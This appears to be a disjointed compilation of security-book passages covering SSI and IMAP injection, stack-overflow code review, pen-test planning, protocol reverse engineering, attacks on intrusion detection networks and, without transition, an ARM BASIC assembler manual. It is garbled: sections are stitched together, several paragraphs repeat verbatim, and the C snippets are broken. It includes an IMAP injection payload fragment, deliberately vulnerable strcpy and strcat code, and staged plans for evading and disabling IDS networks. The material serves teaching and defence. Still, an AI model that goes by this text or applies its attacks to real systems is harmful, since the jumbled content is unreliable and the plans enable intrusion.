directives, both in the body or inside the headers. In the default configuration,
usually, most web servers don't allow the use of the exec directive to execute
system commands.
As in every bad input validation situation, problems arise when the user of
a web application is allowed to provide data that's going to make the
application or the web server itself behave in an unforeseen manner.
Talking about SSI injection, the attacker could provide input that, if inserted
by the application (or maybe directly by the server) into a dynamically
generated page, would be parsed as SSI directives.
Having access to the application source code we can quite easily find out:
1. If SSI directives are used; if they are, then the web server is going
to have SSI support enabled, making SSI injection at least a
potential issue to investigate;
This threat affects all applications that communicate with mail servers
(IMAP/SMTP), generally webmail applications.
Information leaks
Relay/SPAM
It is important to note that the requests being sent should match the technology
being tested. Sending SQL injection strings for Microsoft SQL server when a
MySQL server is being used will result in false positive responses. In this
case, sending malicious IMAP commands is modus operanti since IMAP is
the underlying protocol being tested.
Once the tester has identified vulnerable parameters and has analyzed the
context in which they are executed, the next stage is exploiting the
functionality.
http://<webmail>/read_email.php?message_id=4791
????
FETCH
4791
BODY[HEADER]
V100
CAPABILITY
Result Expected:
.NET as long as /unsafe or unmanaged code is not invoked (such as the use of
P/Invoke or COM Interop)
Stack overflows occur when variable size data is copied into fixed length
buffers located on the program stack without any bounds checking.
Vulnerabilities of this class are generally considered to be of high severity
since exploitation would mostly permit arbitrary code execution or Denial of
Service. Rarely found in interpreted platforms, code written in C and similar
languages is often ridden with instances of this vulnerability. An extract from
the buffer overflow section of OWASP Guide 2.0 states that:
.NET as long as /unsafe or unmanaged code is not invoked (such as the use of
P/Invoke or COM Interop)
char buff[20];
printf("copying
into
buffer");
strcpy(buff,argv[1]);
return 0;
When reviewing code for stack overflows, it is advisable to search for calls to insecure library functions
like gets(), strcpy(), strcat() etc which do not validate the length of source strings and blindly copy data
into fixed size buffers.
char b[1024];
if (severity == 1)
strcat(b,Error
occurred
on);
strcat(b,":");
strcat(b,inpt);
FILE
*fd
=
fopen
("logfile.log",
"a");
fprintf(fd,
"%s",
b);
fclose(fd);
......
}
From above, the line strcat(b,inpt) will result in a stack overflow if inpt
exceeds 1024 bytes. Not only does this demonstrate an insecure usage of strcat,
it also shows how important it is to examine the length of strings referenced by
a character pointer that is passed as an argument to a function; In this case the
length of string referenced by char *inpt. Therefore it is always a good idea to
trace back the source of function arguments and ascertain string lengths while
reviewing code.
Usage of the relatively safer strncpy() can also lead to stack overflows since it
only restricts the number of bytes copied into the destination buffer. If the size
argument that is used to accomplish this is generated dynamically based on
user input or calculated inaccurately within loops, it is possible to overflow
stack buffers. For example:-
Char dest[40];
size=strlen(source)+1
strncpy(dest,source,size)
Vulnerabilities can also appear in URL and address parsing code. In such
cases, a function like memccpy() is usually employed which copies data
into a destination buffer from source until a specified character is not
encountered. Consider the function:
Void func(char *path)
char servaddr[40];
memccpy(servaddr,path,'\');
In this case the information contained in path could be greater than 40 bytes
before \ can be encountered. If so it will cause a stack overflow. A similar
vulnerability was located in Windows RPCSS subsystem (MS03-026). The
vulnerable code copied server names from UNC paths into a fixed size
buffer until a \ was encountered. The length of the server name in this case
was controllable by users.
Apart from manually reviewing code for stack overflows, static code analysis
tools can also be of great assistance. Although they tend to generate a lot of
false positives and would barely be able to locate a small portion of defects,
they certainly help in reducing the overhead associated with finding low
hanging fruits, like strcpy() and sprintf() bugs. A variety of tools like RATS,
Flawfinder and ITS4 are available for analyzing C-style languages.
Reverse Engineering And
Penetration Testing
Much has been written about various tools and technical methods for running
network penetration tests or pen tests. However running an effective and
successful pen test requires some amount of technical management effort and
planning to ensure that the test is successfully architected and executed. Below are
10 useful steps to consider and implement for your next network penetration test
that will wow your team!
1. Comprehensive network assessment
A typical pen test at the simplest level does a penetration test of the companys
network and systems from the outside (external to the network) and optionally a
test from the inside (internal to the network). Many companies choose to stick with
the external assessment only.
Much has been written about various tools and technical methods for running
network penetration tests or pen tests. However running an effective and
successful pen test requires some amount of technical management effort and
planning to ensure that the test is successfully architected and executed. Below are
10 useful steps to consider and implement for your next network penetration test
that will wow your team!
A good comprehensive pen test approach is to have an external test together with
an internal test and explore what internal vulnerabilities can be exploited. This
external-to-internal pivot approach provides good visibility into the effectiveness
of your layered security program. Can an external phishing attempt on a single user
result in a pivot all the way through to administrator privileged access of a high
value internal restricted server? Which layers in your security program were
successful in blocking the attack?
2. Plan and structure the tests for effective results
Treat a pen test as a project just as you would a technical system rollout. Obtain
project management resources if possible and allocate dedicated information
security and IT time and effort.
3. Ensure adequate time for upfront planning
Even with the right resource dedicated to the project, a well-structured pen test
requires some amount of upfront time to plan out the details of the test, align test
goals with management and the pen test team, and review and provide all the
required details to the pen test team. Pay special attention to the Pen Test teams
pretest request for information. If incorrect IP addresses are provided, then some
of the systems or IP ranges will be missing test coverage.
PRE is the process of extracting the structure, attributes, and data from a
network protocol implementation without access to its specification, or in
other words, access to formal semantic documentation of the protocol
specification is not possible.
For the purposes of Computer Network Defense (CND) and incident response,
the protocol's specification is most commonly used to support two goals: the
construction of network signatures and protocol decoders. Protocol decoders
can be a forensic gold mine if packet captures are available to analysts, but
often this is not the case: organizations rarely appreciate the intelligence
provided by protocol decoders and often lack a platform on which to deploy
them. There's a common obstacle, however, to building both signatures and
decoders: the perceived enormity of the task of PRE.
The Errant state is important to call out because some clients will behave
differently if an unexpected condition is encountered. Remember that in the
case of trojan / backdoor clients, the adversary is making a number of
assumptions about the executing environment. The most common error
condition I see is when a trojan cannot reach the server due to some intentional
or incidental access failure. Behaviors in this condition range from the client
becoming extremely verbose in its retry attempts, to extended shutdown modes.
The unfortunate truth is that automated PRE is largely academic for now, and
circumstances where necessary data is embedded in a complex protocol with
bad or "proprietary" documentation do occur. How, then, could a mere mortal
analyst possibly accomplish this task? My answer is "we don't." We let the
objectives of our output determine what we get out of PRE, and when our job
is finished. Again, our objectives are construction of protocol decoders and
network signatures available as quickly as possible. In agreement with these
objectives, it is wise to follow a few principles when performing PRE, which
you will see demonstrated in some of the forthcoming articles on PRE
techniques.
Signature creation can also fall victim to this mentality. Though PRE may have
only identified the role, value, nature, or range of a tiny portion of the protocol,
and it may only be known accurate for a limited set of circumstances, codifying
this in a signature is still valuable if it can yield hits with a manageable false
positive (FP) rate.
Analysts must let their questions about a protocol guide their reverse
engineering. In practice this philosophy is often manifest in a recursive reverse
engineering - detection loop. Partial protocol decoders raise questions about
particular aspects of a protocol that guide reverse engineering. False positives
and false negatives in signatures which inhibit detection serve as requirements
for further PRE. Think of this as the software engineering "spiral" development
model, with the realities of network activity turning into prioritized questions
by analysts using existing decoders and signatures, which become requirements
for PRE that result in incrementally-improved decoders and signatures, and so-
on.
Many protocols can exhibit a huge range of behaviors depending on how the
client or server is configured. Sometimes this is as simple as a text file
accompanying a binary, sometimes it's easily compiled into the code by a
weaponizer (Poison Ivy comes to mind here), and sometimes it requires a
source code rewrite. Just remember: ALL attributes of ALL protocols are
configurable at some level. Attempting to capture all of these conditions in a
signature or decoder becomes an exercise in futility at one point or another.
Analysts should use their heads, and ask themselves a few questions.
How is the protocol going to operate with the information I have in-
hand?
How will the protocol operate successfully in my environment?
What likely assumptions is the adversary going to make, based on
common sense, or other intelligence available from previous
intrusion attempts in the same campaign?
What structures in the binary do functions seem to access that will
change the protocol's attributes?
Reverse Engineering Intrusion
Detection Systems
Intrusion Detection Networks (IDNs) constitute a primary element in current
cyber defense systems. IDNs are composed of different nodes distributed
among a network infrastructure, performing functions such as local
detection{mostly by Intrusion Detection Systems (IDS), information sharing
with other nodes in the IDN, and aggregation and correlation of data from
different sources. Overall, they are able to detect distributed attacks taking
place at large scale or in different parts of the network simultaneously.
Detection paradigms and architectures have also evolved to cope with the
requirements of complex network infrastructures. Rather than stand-alone
components strategically placed to protect a complete network or system, the
current trend is to rely on a distributed network of detection nodes. Intrusion
Detection Networks (IDN) are composed of different IDS nodes distributed
among a network performing local detection and sharing information with other
nodes in the IDN. One of the major advantages of IDNs is that, because the
detection functions are distributed across different network locations, so is the
workload required for each function.
IDNs attempt to solve this problem by distributing the tasks among different
nodes. Depending on their role in the network, some nodes gather local data
and send it to another node, probably with more resources, who correlates the
data and performs actual detection. This separation of duties makes IDNs a
suitable solution for distributed systems, including mobile ad hoc networks
(MANETs), where there are no central nodes and every host must collaborate
to ensure a proper network behavior. IDNs are also used in networks
geographically separated to allow different entities to collaborate and mitigate
large scale attacks [Bye et al., 2010]. Current attacks are capable of infecting
simultaneously various networks or incorporating evasion techniques to pass
undetected [Fogla and Lee, 2006]. Moreover, many zero-day attacks target
simultaneously a huge number of systems worldwide, leaving little time to
patch other networks. Thus, to prevent threats from propagating through
different domains, collaboration between
different IDNs is essential.
Since they are key elements of most organizations' cyberdefense systems, IDSs
often become themselves the target of attacks aimed at undermining their
detection capabilities. This may result in the degradation of the second
property evaluated by the Common Criteria, which states that countermeasures
must be correct. Actually, when attacking a system, the adversary's RST goal is
to degrade the effectiveness of the cyber defenses, thus making the
countermeasures inappropriate. In the case of IDNs, attackers may use common
attacks for networks to degrade the efficiency of the detection accuracy.
1. The decoder receives pieces of raw audit data from the audit data
collectors and transforms each of these pieces into data that the
preprocessor can handle.
2. The preprocessor extracts features from the raw data. It receives the
pieces of data transformed by the decoder, analyzes them to
determine which pieces depend on each other and treats dependent
pieces in such a way that they can be later scrutinized by the
detection engine. A typical preprocessor widely used in network-
based IDSs is the TCP preprocessor, whose main task is to compose
session flows from a given set of TCP segments (reordering
fragments, assembling them, etc). Currently, sophisticated
preprocessors are able to perform detection tasks supplementing
those performed by the detection engine.
3. The detection engine receives the data treated by the preprocessor
and examines it searching for intrusions. If an intrusion is found, the
detection engine requests the alert module to raise an alert.
1. Regarding the source of the audit data, an IDS can be network based
or host based:
Host IDSs (HIDSs): they analyze local data of the devices. Most of them
analyze the sequence of system calls of the programs running in the device.
Within these sequences, optimal HIDS analyze system call arguments, memory
registers, stack states, system logs, user behaviors, etc.
(b) Active IDS: apart from raising an alert, the IDS tries to
neutralize the malicious data by executing a predetermined
ned action. Some authors refer to active IDSs as Intrusion
Prevention System (IPS).
2. Regarding the timing of the detection process, IDSs can be real time
or non-real time.
Misuse detection looks for intrusive evidence in the monitored events using
previous knowledge from known attacks and malicious activity. The most
common approach for misuse detection is to compare the monitored events
with intrusive patterns stored in a database. These stored patterns are called
signatures, and misuse detection is often called signature-based detection. For
example, Snort is a NIDS which contains a huge number of publicly available
signatures. The signatures follow a specific format, and allow for a deep
inspection of the network packets at network (IP protocol), transport (TCP and
UDP protocols) and application layer (protocols such as HTTP, FTP, SMTP,
etc.).
Misuse detection works well for known vulnerabilities and attacks. Indeed,
they have low false positive rates because if an activity matches a signature or
follows a known attack path, then it is very likely that this activity actually has
malicious intentions. However, misuse detection is not able to detect zero-day
attacks. These attacks do not have an associated signature in the IDS, either
because they have been discovered recently and the signatures have not been
published yet, or because the IDS have not been updated with the new required
signatures.
Anomaly Detection
Anomaly detectors compare monitored activity with a predetermined model of
normality to detect intrusions. These systems compute the model of normality
by a learning process that is usually done online, i.e., before deployment,
although recent approaches suggest the use of online training to update the
model as new normal activities are observed. The monitored activity can be
either network, service requests, packet headers, data payloads, etc. During the
learning process, the system analyzes a set of normal data and computes the
normal model. Afterwards, any activity that does not t in the normal model is
considered a potential intrusion.
Classification algorithms build classifiers from a training data set that are
used to classify events in detection time. Given a set of n samples X = X1; :::;
Xn where each sample Xi is composed of j features (F1; :::; Fj), a
classification algorithm generates a classifier that, for each new trace
provided, returns its estimated class Ci from the set of classes C = C1; :::; Ck.
IDNs attempt to solve this problem by distributing the tasks among different
nodes. Depending on their role in the network, some nodes gather local data
and send it to another node, probably with more resources, who correlates the
data and performs actual detection. This separation of duties makes IDNs a
suitable solution for distributed systems, including mobile ad hoc networks.
Networks And Architecture
A large-scale coordinated attack targets or utilizes a large number of hosts that
are distributed over different administrative domains, and probably in
different erent geographical areas. These attacks have the property of targeting
multiple networks or sites simultaneously, and may use evasion techniques to
stealthy compromise each single network. For example, an attacker may slow
down the scan in one single host by increasing the frequency of packets sent to
this host. Meanwhile, it can use the time between packets to scan hosts from
other networks. The main characteristic of large-scale attacks is that they
usually target multiple hosts from either a single host or from many hosts. That
is, the attack is distributed among various hosts.
IDNs are used in many scenarios, from collaborative domains, where different
entities share information to detect global attacks, to local wireless network
composed by a network of sensors, like for example Mobile Ad-hoc Network
(MANET). In both cases, the IDN is composed of multiple nodes distributed
over the network where each node communicates with one or many other
nodes. Depending on how nodes are connected and which are their
responsibilities or roles within the network, the architecture of an IDN can be
either centralized, hierarchical, or distributed.
1. Learning the normal protocol of the NIDS, assume that the With such
knowledge, the adversary can use the NIDS learning algorithm and a
set of normal tracers in order to construct a statistical normal
protocol similar to the one used by the NIDS.
The benefits of ML are manifold. First, they are relatively easy to use and do
not require much understanding about what the insights of the algorithms are.
Tools such as Rapid Miner and WEKA permit users to set-up the algorithms in
a black-box fashion by just providing the input dataset. Second, ML are fast
and provide good results in terms of efficiency. The detection is often very
efficient and consumes little amount of resources. This is a rather important
aspect to detect intrusions in real time, mostly in constrained scenarios such as
MANETs. Third, ML algorithms have been widely studied in the field of
intrusion detection, and provide good results in terms of detection and false
positive rates. At first sight, these strengths makes ML a suitable and helpful
solution for intrusion detection. However, the use of ML for intrusion
detection is flawed as we shall see.
This taxonomy classifies the attacks regarding three aspects: the Influence, the
Specificity and the Security Violation.
2. High cost of errors, i.e., the need of achieving a high detection rate
while having a low false alarm rate. In other areas, an error may
comprise an spam arriving to the client email account or missing a
potential client. However, a successful attack in a system may have
tragic effects.
3. Semantic gap, i.e., the problem of providing security administrators
with a good understanding of the alarms. ML algorithms are able to
discern between classes. However, classical algorithms cannot
explain why a given instance has been classified as its related class.
Thus, a system administrator who wants to know what happened
when analyzing an alert should not have extra information, which is
usually needed.
Taxonomy Of Attacks
Attacks are usually classified regarding the goal of the adversary, which
results in different consequences:
1. Evasion, where an attack is carefully modified so that the IDS would
not be able to detect it. These are the most common attacks studied in
the literature. For example, blending and mimicry techniques are
examples of evasion.
2. Over stimulation, where the IDS is fed with a large number of attack
patterns to overwhelm analysts and security operators. For example,
Mucus is an IDS stimulation tool that generates packets that
purposely matches the signatures of Snort to generate a large number
of detection alerts.
Reverse Engineering comes into play at this point, where the engineer gathers
information about the internals of the IDS by stimulating it with chosen input
patterns and observing the response. The common approach is to perform
query-response analysis, for example to discover signatures used by IDS..
Adversarial Model
In the analysis of attacks and countermeasures against a system, it is important
to establish the capabilities assumed for an adversary. Indeed, depending on
these capabilities, different procedures are established in the design of
countermeasures, which is critical in order to avoid spending unnecessary
resources. Since intrusion detection systems have only been analyzed in
adversarial environments very recently, there is a lack of widely accepted
adversarial models. Despite this, most works in this area assume an adversary
with, at least, the capabilities described next. The attacks presented in this
work assume that the adversary has knowledge about the following
information:
1. The distribution of the training data used by the IDS. This does not
mean that the adversary has the same training dataset, but she must
know the distribution and characteristics like the protocol used, type
of tracers, normal contents, common patterns, etc.
Both the distribution and feature construction method may be kept secret in
many cases. However, from the security point of view, this possibility cannot
be underestimated, and the security of the system should not reside in the
obscurity of its implementation.
Reverse Engineering e-Commerce
Websites And Applications
Order Management
Coupon and Reward Management
Payment Gateway Integration, and
Content Management System Integration
Order Management Flaws
Order Management flaws consist of misuse the order placement process:
the bad content model, in which case the anomaly score is incremented by 5.
The anomaly score of a packet is obtained by dividing the count by the total
number of n-grams processed. Note that the use of bad content models makes it
possible for the anomaly scores to be greater than 1. With this semi-supervised
procedure, the already known attacks are taken into account, making Anagrams
more efficient. Randomizing anagrams makes reverse engineering attacks more
difficult in that that a random mask with 3 sets is used. Incoming packets are
partitioned into 3 chunks by applying a randomly generated mask. Such a mask
consists of contiguous strings of 0s, 1s or 2s. An anagram establishes that each
string must be at least 10 bytes long in order to keep the n-gram structure of the
packets.
The mask is applied to the payload of a packet to assign each block to one of
the three possible sets. Each resulting set is considered by an anagram as an
independent packet formed by the concatenation of individual blocks, and are
tested separately, thus obtaining different anomaly scores. The higher of these
scores is the one given as anomaly score of the original packet. If such an
anomaly score exceeds a predetermined threshold then the packet is tagged as
anomalous", otherwise it is considered normal".
The random mask applied in the detection process is kept secret. Consequently,
an attacker does not know how the different parts of a packet will be
processed in the detection process and, therefore, does not know where normal
padding should be added in order to achieve an acceptable ratio of unseen n-
grams.
By using randomization, the attacker will not know exactly how each packet
will be processed. and, therefore, where to put the padding to evade detection.
Attacking A Randomized Anagram
One possible method to attack a randomized anagram is to deploy the
adversarial model of approach. In such a reverse engineering attack, the
attacker must possess the ability to interact with the system being attacked,
often in ways that differ significantly from what may be regarded as normal
(e.g., by providing malformed inputs or an unusually large number of them). In
some cases, the ability to do so is the bare minimum required to learn
something useful about the system's inner workings.
An adversarial model seeks to analyze the security of an anagram against
reverse engineering attacks. In particular, the attack centers round querying the
anagram with specific inputs and analyzing the corresponding responses. The
method is as follows:
1. Prepare a payload.
Even though the use of randomization certainly makes reverse engineering into
a target network harder, it has obvious flaws which show that an attacker who
learns the masking algorithm could actually take advantage of the randomized
detection process to evade an anagram, thus downgrading the network security.
The procedure of attack in this way needs to be constantly evaluated as
countermeasures are more than likely to be put in place within a short space of
time as security loopholes are discovered. Thus, each analyzed packet should
be tested against a different random mask, possibly with different parameters
too. While this would certainly stop our attacks from being effective in the
short term they can be bypassed in future with a similar procedure.
Techniques for Reverse Engineering
Intrusion Detection Networks
To further expand and make clear, these adversarial models of attack are
generally categorized and simplified as internal and external attacks.
External adversaries have control of the channels and communications
between nodes but are not part of the IDN. Thus, if security protocols are used
to provide confidentiality and integrity mechanisms, they may not be able to
inject or intercept packets. On the other hand, internal attackers are
adversaries who have gained access and have control of, at least, one node
within the IDN. They may possess cryptographic keys.
Defending a network from external adversaries can be done using traditional
security mechanisms, such as cryptographic protocols and a Public Key
encryption Infrastructure. However, these techniques cannot be a ordered in
all scenarios. It usually cannot determine whether the information is real or it
has been forged by the source (i.e an internal attacker) or manipulated during
the communication through the network (by an external attacker). Knowing
how much trust can be placed in the received information is one of the key
challenges in the design of IDNs. In simple terms, nodes in an IDN send and
receive data using communication channels. The communication consists of
the exchange of packets of information using network protocols and the
specific format of the IDMs. There is much scope for attacking this type of
system through reverse engineering.
Some rudimentary intrusive attacks can be deployed such as interception,
fabrication, modification and blocking.
Interception
This is a passive type of intrusion which seeks to compromise the
confidentiality of information on a network. The adversary eavesdrops the
contents of the messages transmitted in the network channels. For example, a
malicious node which monitors its neighbors and performs interceptions of
data.
Fabrication
Fabrication attacks compromise the authenticity of data on a network or
individual target. The attacker generates fake data and sends it to the intended
target. For example, using spoofed addresses, the attacker may fabricate
packets that match the signatures of an IDS in order to overstimulate it.
Modification
This attack targets the integrity of the data. The adversary intercepts data,
modifies its contents and forwards it to the actual destination. For example,
the attacker may modify the content of an attack to evade the signatures
matching process from IDSs.
Blocking
This attack targets the integrity and availability of the data. The adversary
interrupts the communication or makes it unavailable. Packet Dropping attacks
are an example of this type of weapon in an attacker s arsenal, where a
malicious node drops packets that are supposed to be forwarded and they dont
reach their destination.
Over stimulation
This is where a set of packets are sent to the node to make it trigger a huge
amount of responses. Because the objective is to over stimulate the system to
make it impractical, it can be applied to every function of the nodes. Over
stimulation is usually carried out in tandem with fabrication. I.e. the attacker
generates some specific packet that provokes the node reaction. For example,
by fabricating packets that match the signatures of the targeted node the
adversary can overwhelm security staff or overload the IDS resources.
Poisoning
The attacker looks for nodes that update their detection function in real time
with new data. The goal is to inject some noise forcing the detection function
to learn wrong patterns. Since the objective of is to inject specific information
in the node, it needs modification (of data sent by other nodes in the IDN) or
fabrication of new data attacks.
Denial of Service
This involves overloading the resources of the nodes in networks to attack
their availability and bring about downtime.To force these node functions to
stop working, they may either be flooded to overload their resource capability,
using fabrication, or can be blocked to prevent the nodes from receiving the
required data to function correctly.
Response Hijacking
In this scenario, the attacker sends selected intrusive data to the node, forcing
it to generate a specific response. To provoke a specific response in the node,
the attacker may deploy some of the following techniques:
Blocking.
As explained above with the evasion, the IDN node may be waiting for
specific IDMs or packets to confirm that a peer is not malicious. If the attacker
blocks this critical data sent by a third peer, the node may erroneously believe
that this third peer is malicious.
Modification
The attacker may modify reports or IDMs to indicate that a third node is
malicious.
Fabrication
As with modification, the attacker can generate false reports about a third node
to force the detector to trigger an erroneous response.
Reverse Engineering
The adversary gains information about the behavior of the node (architecture,
detection function, set of measurements, etc.). It is applicable to every function
in the nodes. This could be done using the same techniques employed for an
Over stimulation attack, but in addition the node must intercept the tracer to
monitor both the inputs and outputs to the node and make the analysis. A
paradigmatic reverse engineering attack in IDNs occurs when the attacker
deploys a tracer analysis of the network in order to locate the IDN nodes and
their roles in the structure of the network(s).
Evasion
An evasion attack succeeds when a IDN node is not able to detect a
misbehaving node. The attacker should either block, modify, or fabricate data
in network channels of the nodes.
Analyzing Larger Networks
Analyzing or attacking larger networks (such as WANs, Data Centers etc)
require combined intrusion techniques combined with elements of social
engineering and reverse engineering.
The combined actions of the above result in a denial of service and thwarts
alert sharing across multiple networked sites.
At this point reverse engineering can be deployed to ascertain which systems
implement IDN nodes. The goal is to discover which nodes are running share
alerts at the top of the hierarchy. This means intercepting the OIDM channel to
discover who is responding to the previous Over stimulation attack. Then a a
man-in-the-middle attack can be deployed at the Internet access point (router)
of the site under attack and perform a tracer analysis of the systems sending
information to Internet.
The final phase is to conduct a denial of service attack proper. The goal of the
attack is to isolate the site from the rest of the IDM and block alerts to the
internet.
Essentially, analyzing and/or attacking larger networks involves a three phase
approach. Namely, Over stimulation, reverse engineering and denial of
service.
Reverse Engineering Attacks On E-
commerce Websites Using Genetic
Programming
The key to reverse engineer a e-commerce site is to understand the behavior of
its IDS system(s).
Genetic Programming (GP) can be utilized to obtain an approximation of the
decision surface of the actual detection model at the core of the IDS.
Given a search problem over a large solution space, GP performs a heuristic
search to obtain a locally optimal solution. GP is a technique that keeps a set
of programs (also called the population of individuals), randomly initialized,
which are evolved according to various procedures inspired by the laws of
natural selection. In our scheme, each program (individual) has a tree-like
structure where the root and intermediate nodes are mathematical and logic
functions, and the leaves are terminal features. Each generation is obtained by
selecting the best individuals from the previous one. Some individuals are
mutated (changing an internal subtree by another) or subject to crossover
(exchanging subtrees from two different individuals), according to a set of
parameters. After a given number of generations, or else when an optimal
solution is achieved, the algorithm stops and the best individual of the last
generation is given as solution. These values are obtained using 10-fold cross-
validation and using the combination of parameters that performs best in terms
of accuracy.
Evasion Attack
The reverse engineering attack explained above provides the adversary with a
model of the way the IDS works that facilitates the construction of evasion
attacks. Recall that the main idea of an evasion is to transform a instance that
would be classified as a true positive by the IDS into one that would result in
a false negative, i.e., performing attacks without generating alarms.
The payload obtained after the modification must represent valid HTTP
payload. For example, the word GET cannot be removed from a HTTP
request.
The attack still works after the modification. For example, removing the word
INSERT in an SQL Injection translates into a useless payload for the
adversary.
The risk-rating module outputs the total risk of the IDN, and for each node, the
risks for each attack and its aggregated risk (sum of all the attack risks). The
total risk of the IDN is the sum of the risks of all the individual nodes. This
information together with the information about which nodes have been
targeted (given by the threat module), is given to the allocation module.
The next component is optimizing a Cost-Risk Trade-off. For each solution, the
more risk is mitigated, the higher the cost. Ideally, optimal solutions should
minimize both the risk and the cost. However, these are mutually conflicting
objectives and there isnt a single optimal solution. Thus, a trade-off between
risk and cost must be considered. Accordingly, we use Multi-Objective
Optimization (MOO) to obtain the set of optimal solutions that conform the
pareto set. In MOO with two objectives, a solution from the pareto set is
called non-dominated if there is not any other solution that improves one of the
objectives without degrading the other objective. The set of non-dominated
solutions is called the pareto front.
There are several algorithms to obtain the pareto front. In our experiments, we
use an evolutionary MOO algorithm known as SPEA2. SPEA2 is one of the
most popular MOO evolutionary algorithms and has been successfully applied
in the intrusion detection sphere. Indeed, it is one of the two MOO algorithms
implemented in the ECJ framework.The other algorithm implemented in ECJ is
NSGA2 (Non-dominated Sorting Genetic Algorithm). While both of them are
valid algorithms, SPEA2 obtains further optimization in the central points of
the pareto front than NSGA2, which is more convenient to obtain solutions in
the boundaries of the pareto front. In our particular domain, solutions that are
very costly or that reduce very low risk are generally not recommended.
Accordingly, the main purpose is to optimize the points where it is unclear
where the trade-off between cost and risk lie, which are the central points of
the pareto front.
When it is required to reduce the risk completely or when there are unlimited
resources, then all the nodes are protected completely (i.e, all the risk is
mitigated). However, when the cost is limited or the IDN tolerates some risk,
the pareto front indicates which are the optimal solutions. These solutions
indicate which are the countermeasures to be applied in order to solve one of
the two following problems:
1. Given a tolerable risk, the problem is selecting the cheapest set of counter-
measures that mitigates the risk below a tolerable level of risk.
If the budget is limited, the allocation solution must reduce the risk the most. If
there is a tolerable risk, the allocation solution must be the cheapest that
decreases the risk below the tolerated level. In some situations, though,
neither the cost nor the risk are limited. In these cases, it is helpful to know
whether it is worth to spend more resources to reduce the risk or not. When
defending an IDN, one may think that the more resources are spent, the more
risk is mitigated. However, this is not always the case.
In order to save resources, it is useful to know when it is convenient to
allocate new countermeasures, and where should they be placed. The decision
depends on several parameters, like the architecture of the network, the
influences between nodes, the cost of setting countermeasures in the nodes
etc.However, when dealing with bigger networks and having non-trivial
alternatives (i.e., which are not random), the value of DEFIDNET is even
greater.
Memory Pointers
You need to tell the assembler the start address of the area of memory you have
reserved. The simplest way to do this is to assign P% to point to the start of
this area. For example:
DIM code% required_size... P% = code%
P% is then used as the program counter. The assembler places the first
assembler instruction at the address P% and automatically increments the value
of P% by four so that it points to the next free location. When the assembler has
finished assembling the code, P% points to the byte following the final location
used. Therefore, the number of bytes of machine code generated is given by:
P% - code%
This method assumes that you wish subsequently to execute the code at the
same location.
The position in memory at which you load a machine code program may be
significant. For example, it might refer directly to data embedded within itself,
or expect to find routines at fixed addresses. Such a program only works if it is
loaded in the correct place in memory. However, it is often inconvenient to
assemble the program directly into the place where it will eventually be
executed. This memory may well be used for something else whilst you are
assembling the program. The solution to this problem is to use a technique
called 'offset assembly' where code is assembled as if it is to run at a certain
address but is actually placed at another.
To do this, set O% to point to the place where the first machine code
instruction is to be placed and P% to point to the address where the code is to
be run.
To notify the assembler that this method of generating code is to be used, the
directive OPT, which is described in more detail below, must have bit 2 set.
It is usually easy, and always preferable, to write ARM code that is position
independent.
Implementing Passes
Normally, when the processor is executing a machine code program, it
executes one instruction and then moves on automatically to the one following
it in memory. You can, however, make the processor move to a different
location and start processing from there instead by using one of the 'branch'
instructions. For example:
.result_was_0 ... BEQ result_was_0
The fullstop in front of the name result_was_0 identifies this string as the name
of a 'label'. This is a directive to the assembler which tells it to assign the
current value of the program counter (P%) to the variable whose name follows
the fullstop.
BEQ means 'branch if the result of the last calculation that updated the PSR
was zero'. The location to be branched to is given by the value previously
assigned to the label result_was_0.
The label can, however, occur after the branch instruction. This causes a slight
problem for the assembler since when it reaches the branch instruction, it
hasn't yet assigned a value to the variable, so it doesn't know which value to
replace it with.
You can get around this problem by assembling the source code twice. This is
known as two-pass assembly. During the first pass the assembler assigns
values to all the label variables. In the second pass it is able to replace
references to these variables by their values.
It is only when the text contains no forward references of labels that just a
single pass is sufficient.
These two passes may be performed by a FOR...NEXT loop as follows:
DIM code% required_sizeFOR pass% = 0 TO 3 STEP 3 P% = code% [
OPT pass% ... further assembly language statements and assembler
directives] NEXT pass%
Note that the pointer(s), in this case just P%, must be set at the start of both
passes.
The OPT Directive
The OPT is an assembler directive whose bits have the following meaning:
0 Assembly listing enabled if set
1 Assembler errors enabled
2 Assembled code placed in memory at
O% instead of P%
3 Check that assembled code does not
exceed memory limit L%
Bit 0 controls whether a listing is produced. It is up to you whether or not you
wish to have one or not.
Bit 1 determines whether or not assembler errors are to be flagged or
suppressed. For the first pass, bit 1 should be zero since otherwise any
forward-referenced labels will cause the error 'Unknown or missing variable'
and hence stop the assembly. During the second pass, this bit should be set to
one, since by this stage all the labels defined are known, so the only errors it
catches are 'real ones' - such as labels which have been used but not defined.
Bit 2 allows 'offset assembly', ie the program may be assembled into one area
of memory, pointed to by O%, whilst being set up to run at the address pointed
to by P%.
Bit 3 checks that the assembled code does not exceed the area of memory that
has been reserved (ie none of it is held in an address greater than the value
held in L%). When reserving space, L% might be set as follows:
DIM code% required_sizeL% = code% + required_size
User mode is the normal program execution state. SVC mode is a special mode
which is entered when calls to the supervisor are made using software
interrupts (SWIs) or when an exception occurs. From within SVC mode certain
operations can be performed which are not permitted in user mode, such as
writing to hardware devices and peripherals. SVC mode has its own private
registers R13 and R14. So after changing to SVC mode, the registers R0 - R12
are the same, but new versions of R13 and R14 are available. The values
contained by these registers in user mode are not overwritten or corrupted.
Similarly, IRQ and FIQ modes have their own private registers (R13 - R14
and R8 - R14 respectively).
Although only 16 registers are available at any one time, the processor actually
contains a total of 27 registers.
For a more complete description of the registers, see the chapter entitled ARM
Hardware.
Condition Codes
All the machine code instructions can be performed conditionally according to
the status of one or more of the following flags: N, Z, C,
V. The sixteen available condition codes are:
AL Always This is the default
CC Carry clear C clear
CS Carry set C set
EQ Equal Z set
GE Greater than (N set and V set) or (N clear
or equal and
V clear)
GT Greater than ((N set and V set) or (N clear
and V clear)) and Z clear
HI Higher C set and Z clear
(unsigned)
LE Less than or (N set and V clear) or (N
equal clear
and V set) or Z set
LS Lower or C clear or Z set
same
(unsigned)
LT Less than (N set and V clear) or (N
clear
and V set)
MI Negative N set
NE Not equal Z clear
NV Never
PL Positive N clear
VC Overflow V clear
clear
VS Overflow set V set
Two of these may be given alternative names
as follows:
You should not use the NV (never) condition code - see Any instruction that
uses the 'NV' condition flag.
The instruction Set
The available instructions are introduced below in categories indicating the
type of action they perform and their syntax. The description of the syntax
obeys the following standards:
indicates that the contents of the brackets
are
optional (unlike all other chapters, where
we
have been using [ ] instead)
(x|y) indicates that either x or y but not both may
be given
#exp indicates that a BASIC expression is to be
used
which evaluates to an immediate constant.
Move Instructions
Syntax
op codecondS Rd, (#exp|Rm),shift
There are two move instructions. 'Op2' means '(#exp|Rm),shift':
Instruction Calculation
Performed
